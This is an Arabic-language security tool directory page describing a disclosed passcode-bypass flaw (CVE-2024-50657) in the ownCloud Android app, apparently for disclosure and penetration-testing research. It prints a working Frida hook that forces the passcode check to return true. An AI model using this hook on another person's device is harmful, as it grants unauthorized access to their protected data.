Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50657 — يوفر استغلالًا لإثبات المفهوم لثغرة CVE-2024-50657، وهي ثغرة تحكم وصول غير صحيح في تطبيق Owncloud لنظام أندرويد، مما يوضح تجاوز رمز المرور عبر خطاف Frida. | Kitploit
أدوات/GitHubGitHub/sahalll/cve-2024-50657
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن الجوال
GitHubsahalll/cve-2024-50657

CVE-2024-50657

يوفر استغلالًا لإثبات المفهوم لثغرة CVE-2024-50657، وهي ثغرة تحكم وصول غير صحيح في تطبيق Owncloud لنظام أندرويد، مما يوضح تجاوز رمز المرور عبر خطاف Frida.

عرض المستودع
10منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50657: التحكم في الوصول غير صحيح في تطبيق Owncloud apk

مشكلة في تطبيق Owncloud android apk الإصدار 4.4.1 تسمح لمهاجم قريب جسديًا بتصعيد الصلاحيات عبر فئة PassCodeViewModel، وتحديدًا في طريقة checkPassCodeIsValid.

نوع الثغرة

التحكم في الوصول غير صحيح

بائع المنتج

Owncloud

قاعدة كود المنتج المتأثر

Owncloud android apk - 4.4.1

المكون المتأثر

com.owncloud.android.presentation.security.passcode.PassCodeViewModel

الاستغلال

تحديد الفئة والطريقة المستهدفة:

تدير فئة PassCodeViewModel في التطبيق منطق التحقق من رمز المرور. طريقة checkPassCodeIsValid داخل هذه الفئة مسؤولة عن تحديد صلاحية رمز المرور المدخل.

ربط الطريقة باستخدام Frida:

يتم استخدام سكربت Frida لربط طريقة checkPassCodeIsValid في فئة PassCodeViewModel. يتم تعديل تنفيذ الطريقة لإرجاع true دائمًا، متجاوزًا التحقق الفعلي من رمز المرور.

التنفيذ:

يتم تنفيذ سكربت Frida أثناء تشغيل التطبيق. سيتم قبول أي رمز مرور يدخله المستخدم على أنه صالح، مما يسمح بالوصول غير المصرح به.

إثبات المفهوم

Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true return true;

};

});

رابط فيديو إثبات المفهوم : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing

التأثير:-

هذه الثغرة هي ثغرة تجاوز أمني من جانب العميل. تؤثر على مستخدمي التطبيق الذين يعتمدون على ميزة رمز المرور لحماية البيانات الحساسة أو تقييد الوصول إلى وظائف معينة في التطبيق. من خلال استغلال هذه الثغرة، يمكن للمهاجم تجاوز فحص رمز المرور والحصول على وصول غير مصرح به إلى أجزاء من التطبيق التي يجب حمايتها، مما قد يكشف بيانات المستخدم أو يسمح بإجراءات غير مصرح بها داخل التطبيق.

تنزيل الأداة